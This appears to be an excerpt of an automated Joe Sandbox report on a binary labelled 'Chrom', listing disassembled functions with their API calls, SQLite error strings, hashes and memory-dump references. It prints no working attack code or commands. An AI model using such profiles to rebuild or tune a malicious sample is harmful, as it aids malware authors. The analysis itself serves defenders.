                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2163313125-0
                                                                                                                                                        • Opcode ID: ead36faa3fb79a80cd8612a374053d91ddf5485b81bdcaaea8d99c602293a2a0
                                                                                                                                                        • Instruction ID: f502094e92981caa4834973bf97846e608375c731a187de988a633f4dd51eeda
                                                                                                                                                        • Opcode Fuzzy Hash: ead36faa3fb79a80cd8612a374053d91ddf5485b81bdcaaea8d99c602293a2a0
                                                                                                                                                        • Instruction Fuzzy Hash: C2317076A00209AFDB14CFB8CC85AEEBBB9FB48355F150179E901F3290DA71AD458B60
                                                                                                                                                        Function 004037BE Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 370COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00403A68
                                                                                                                                                        • _snwprintf.MSVCRT ref: 00403AFB
                                                                                                                                                        • _snwprintf.MSVCRT ref: 00403B26
                                                                                                                                                        • _snwprintf.MSVCRT ref: 00403B51
                                                                                                                                                        • wcschr.MSVCRT ref: 00403972
                                                                                                                                                          • Part of subcall function 0040B0B2: wcslen.MSVCRT ref: 0040B0CE
                                                                                                                                                          • Part of subcall function 0040B0B2: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F32D), ref: 0040B0F1
                                                                                                                                                          • Part of subcall function 0040AEF6: wcslen.MSVCRT ref: 0040AF08
                                                                                                                                                          • Part of subcall function 0040AEF6: free.MSVCRT ref: 0040AF2E
                                                                                                                                                          • Part of subcall function 0040AEF6: free.MSVCRT ref: 0040AF51
                                                                                                                                                          • Part of subcall function 0040AEF6: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040B39C,?,000000FF), ref: 0040AF75
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _snwprintf$freememcpywcslen$memsetwcschr
                                                                                                                                                        • String ID: "$"$%I64d
                                                                                                                                                        • API String ID: 22347003-3439576549
                                                                                                                                                        • Opcode ID: f2385fb97e0c4f99ddef286ed600442e38c7ba1bb554b94d3fe1eb697817be01
                                                                                                                                                        • Instruction ID: 0bf4e81249543337a88649caf9663a23bfc85987250b829cb93633c0d649e96a
                                                                                                                                                        • Opcode Fuzzy Hash: f2385fb97e0c4f99ddef286ed600442e38c7ba1bb554b94d3fe1eb697817be01
                                                                                                                                                        • Instruction Fuzzy Hash: 94D1A172508345AFD710EF55C88199BBBE8FF84308F00493FF591A3191D779EA498B9A
                                                                                                                                                        Function 00403037 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$wcslen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3592753638-3916222277
                                                                                                                                                        • Opcode ID: 817fdffa1778754f202b473bcf56fa80498cf4c5f79b1c0829f3a8a504be4d4d
                                                                                                                                                        • Instruction ID: c97d06dd0f2be15faafac33d75df6d0848abc1c3546c13c08877cf69662a8948
                                                                                                                                                        • Opcode Fuzzy Hash: 817fdffa1778754f202b473bcf56fa80498cf4c5f79b1c0829f3a8a504be4d4d
                                                                                                                                                        • Instruction Fuzzy Hash: E9616D30C0521ADADF18AF95E4814EEBB79FF08307F60857FE411B6295DB394A81CB59
                                                                                                                                                        Function 0040AC20 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409D23,?,00000000,?,004101B0,00000000,?,004122A5,00000000), ref: 0040AC45
                                                                                                                                                        • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409D23,?,00000000,?,004101B0), ref: 0040AC63
                                                                                                                                                        • wcslen.MSVCRT ref: 0040AC70
                                                                                                                                                        • wcscpy.MSVCRT ref: 0040AC80
                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409D23,?,00000000,?,004101B0,00000000), ref: 0040AC8A
                                                                                                                                                        • wcscpy.MSVCRT ref: 0040AC9A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                        • String ID: Unknown Error$netmsg.dll
                                                                                                                                                        • API String ID: 2767993716-572158859
                                                                                                                                                        • Opcode ID: 65878271f7dde4f835bb4f16d13d15af7b94efba0f9313b390defd79aaf9ef92
                                                                                                                                                        • Instruction ID: 2c1f00bf4471f0602265d83304054939549967734e239daa98e0476f80b6536b
                                                                                                                                                        • Opcode Fuzzy Hash: 65878271f7dde4f835bb4f16d13d15af7b94efba0f9313b390defd79aaf9ef92
                                                                                                                                                        • Instruction Fuzzy Hash: 15014231208210BFFB142B61DE4AEAF7B6CDF01B91F21003AF902B00D1DA385E90D69E
                                                                                                                                                        Function 00408F0A Relevance: 13.9, APIs: 11, Instructions: 137stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00408F30
                                                                                                                                                        • memset.MSVCRT ref: 00408F47
                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408F6A
                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408FC3
                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408FDA
                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408FED
                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409000
                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409013
                                                                                                                                                        • wcscpy.MSVCRT ref: 00409022
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00409048
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00409062
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: strcpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4248099071-0
                                                                                                                                                        • Opcode ID: 3b10a0de6ee468264d86d1eb0d10d9c5d0e098c8a42a896ac47af6df3413975e
                                                                                                                                                        • Instruction ID: 9fcf6790c625b5749f60fa5132a1aa849aae2f3610ed6a5dc53586237da03b21
                                                                                                                                                        • Opcode Fuzzy Hash: 3b10a0de6ee468264d86d1eb0d10d9c5d0e098c8a42a896ac47af6df3413975e
                                                                                                                                                        • Instruction Fuzzy Hash: DA51FCB59007189FDB60DF65C884FDAB7F8BB08314F0045AAE55DE3241DB34AA88CF65
                                                                                                                                                        Function 0043150A Relevance: 13.7, APIs: 2, Strings: 7, Instructions: 245COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        • unable to open database: %s, xrefs: 00431761
                                                                                                                                                        • cannot ATTACH database within transaction, xrefs: 00431579
                                                                                                                                                        • database is already attached, xrefs: 00431634
                                                                                                                                                        • too many attached databases - max %d, xrefs: 00431563
                                                                                                                                                        • out of memory, xrefs: 00431778
                                                                                                                                                        • attached databases must use the same text encoding as main database, xrefs: 00431682
                                                                                                                                                        • database %s is already in use, xrefs: 004315DB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpymemset
                                                                                                                                                        • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                        • API String ID: 1297977491-2001300268
                                                                                                                                                        • Opcode ID: fc04c1ccaf6d060ca3cb3a4a573306b6aac5391b95642690e4c4f6da1e14753e
                                                                                                                                                        • Instruction ID: 41aed9512f3f75185fd37d9d4a788dbe0235547fbfc8844ed61f99ff34c0eb5c
                                                                                                                                                        • Opcode Fuzzy Hash: fc04c1ccaf6d060ca3cb3a4a573306b6aac5391b95642690e4c4f6da1e14753e
                                                                                                                                                        • Instruction Fuzzy Hash: 6091B670A00305AFDB10DF95C481B9ABBF1EF48308F24945FE8559B362D778E941CB59
                                                                                                                                                        Function 0040E63B Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E428
                                                                                                                                                          • Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E436
                                                                                                                                                          • Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E447
                                                                                                                                                          • Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E45E
                                                                                                                                                          • Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E467
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E67B
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E697
                                                                                                                                                        • memcpy.MSVCRT(?,0045B248,00000014,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?), ref: 0040E6BC
                                                                                                                                                        • memcpy.MSVCRT(?,0045B234,00000014,?,0045B248,00000014,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?), ref: 0040E6D0
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,004121F5,00000000), ref: 0040E753
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004121F5,00000000), ref: 0040E75D
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,004121F5,00000000), ref: 0040E795
                                                                                                                                                          • Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D621
                                                                                                                                                          • Part of subcall function 0040D5E2: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D6BA
                                                                                                                                                          • Part of subcall function 0040D5E2: memcpy.MSVCRT(00000000,00000002), ref: 0040D6FA
                                                                                                                                                          • Part of subcall function 0040D5E2: wcscpy.MSVCRT ref: 0040D663
                                                                                                                                                          • Part of subcall function 0040D5E2: wcslen.MSVCRT ref: 0040D681
                                                                                                                                                          • Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D68F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                        • String ID: ($d
                                                                                                                                                        • API String ID: 1140211610-1915259565
                                                                                                                                                        • Opcode ID: 22d640288c57e05958ef48d510536d835924167508facb2840f18c0f6a69e3cb
                                                                                                                                                        • Instruction ID: 861c2aa1e39ae2bba27ef8b85a75b2e75a9a29af417f25c333be1a6f913ae9ac
                                                                                                                                                        • Opcode Fuzzy Hash: 22d640288c57e05958ef48d510536d835924167508facb2840f18c0f6a69e3cb
                                                                                                                                                        • Instruction Fuzzy Hash: 3C517FB1601704AFD724DF2AC486B5AB7F8FF48314F10892EE55ACB391DB74E5408B58
                                                                                                                                                        Function 004197DE Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 00419836
                                                                                                                                                        • Sleep.KERNEL32(00000001), ref: 00419840
                                                                                                                                                        • GetLastError.KERNEL32 ref: 00419852
                                                                                                                                                        • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 0041992A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3015003838-0
                                                                                                                                                        • Opcode ID: 14e06bfcd18a1faaafc00e1b2c20e061f42331a31f2f6822b30b51d360152e16
                                                                                                                                                        • Instruction ID: 6a48cf500290cbfe024f60d9f8fa3e5acb2fed0f29f408aef03af8af8d2d1aa4
                                                                                                                                                        • Opcode Fuzzy Hash: 14e06bfcd18a1faaafc00e1b2c20e061f42331a31f2f6822b30b51d360152e16
                                                                                                                                                        • Instruction Fuzzy Hash: 434115B5028301AFE7209F25CC217A7B3E0AFC1714F10092EF5A552390DB79DDC98A1E
                                                                                                                                                        Function 0041A475 Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045EBC0,00419B91,00000000,?,00000000,00000000), ref: 0041A49F
                                                                                                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 0041A4A6
                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041A4B3
                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 0041A4C8
                                                                                                                                                        • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045EBC0,00419B91,00000000,?,00000000,00000000), ref: 0041A4D1
                                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000), ref: 0041A4D8
                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041A4E5
                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 0041A4FA
                                                                                                                                                        • free.MSVCRT ref: 0041A503
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2802642348-0
                                                                                                                                                        • Opcode ID: 9713d0eb204f2a511566aa6d075d332d8e1a186ec528611af723e0883a3f4745
                                                                                                                                                        • Instruction ID: f0aea9e426d4f49770c787e6b61ec6af62ac575cb635bed3fd537f80c1297bc8
                                                                                                                                                        • Opcode Fuzzy Hash: 9713d0eb204f2a511566aa6d075d332d8e1a186ec528611af723e0883a3f4745
                                                                                                                                                        • Instruction Fuzzy Hash: 3311063D5062107AC62137306D8D5BF3565879B379B110236EA23922D1DB2C0CE6512F
                                                                                                                                                        Function 00416DE5 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.MSVCRT(?,&quot;,0000000C,?,?,00000000,0040F92F,?,?,?,<item>), ref: 00416E1C
                                                                                                                                                        • memcpy.MSVCRT(?,&amp;,0000000A,?,?,00000000,0040F92F,?,?,?,<item>), ref: 00416E48
                                                                                                                                                        • memcpy.MSVCRT(?,&lt;,00000008,?,?,00000000,0040F92F,?,?,?,<item>), ref: 00416E62
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy
                                                                                                                                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                        • API String ID: 3510742995-3273207271
                                                                                                                                                        • Opcode ID: d67847fae3f197d59aa4d50c09892c40249a44cebd0e4ea6531cd0ad7979b3c5
                                                                                                                                                        • Instruction ID: d80b0e8a1faee3cf81fd98aea7e87b5c7a6978c7cc7b6d64d1c3866e47b73bb9
                                                                                                                                                        • Opcode Fuzzy Hash: d67847fae3f197d59aa4d50c09892c40249a44cebd0e4ea6531cd0ad7979b3c5
                                                                                                                                                        • Instruction Fuzzy Hash: 940180BAE4472061E6312109CC42FF716599B63716FA3472BFD46252C6E18D89C781AF
                                                                                                                                                        Function 0041548C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00413909,00000000,00000000), ref: 004154C7
                                                                                                                                                        • memset.MSVCRT ref: 00415529
                                                                                                                                                        • memset.MSVCRT ref: 00415539
                                                                                                                                                          • Part of subcall function 004153A6: wcscpy.MSVCRT ref: 004153CF
                                                                                                                                                        • memset.MSVCRT ref: 00415624
                                                                                                                                                        • wcscpy.MSVCRT ref: 00415645
                                                                                                                                                        • CloseHandle.KERNEL32(?,9A,?,?,?,00413909,00000000,00000000), ref: 0041569B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                        • String ID: 9A
                                                                                                                                                        • API String ID: 3300951397-4291763745
                                                                                                                                                        • Opcode ID: cb1afc34fd9e2d64f19af581a3b5eaedaf59f9c3ee057bb96672fc9edb01fa6c
                                                                                                                                                        • Instruction ID: 195d0570f18187fafaf8b777caec24cc97833dc6dbb2a5a73c5ac716df796b0f
                                                                                                                                                        • Opcode Fuzzy Hash: cb1afc34fd9e2d64f19af581a3b5eaedaf59f9c3ee057bb96672fc9edb01fa6c
                                                                                                                                                        • Instruction Fuzzy Hash: 43511971508740EFD720DF25C888ADBBBE9FBC4344F400A2EF99982251DB75D944CBAA
                                                                                                                                                        Function 0040D5E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D621
                                                                                                                                                        • wcscpy.MSVCRT ref: 0040D663
                                                                                                                                                          • Part of subcall function 0040DAD4: memset.MSVCRT ref: 0040DAE7
                                                                                                                                                          • Part of subcall function 0040DAD4: _itow.MSVCRT ref: 0040DAF5
                                                                                                                                                        • wcslen.MSVCRT ref: 0040D681
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D68F
                                                                                                                                                        • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D6BA
                                                                                                                                                        • memcpy.MSVCRT(00000000,00000002), ref: 0040D6FA
                                                                                                                                                          • Part of subcall function 0040D540: ??2@YAPAXI@Z.MSVCRT(00000000,0040D5F0,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D57A
                                                                                                                                                          • Part of subcall function 0040D540: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D5F0,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D598
                                                                                                                                                          • Part of subcall function 0040D540: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D5F0,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D5B6
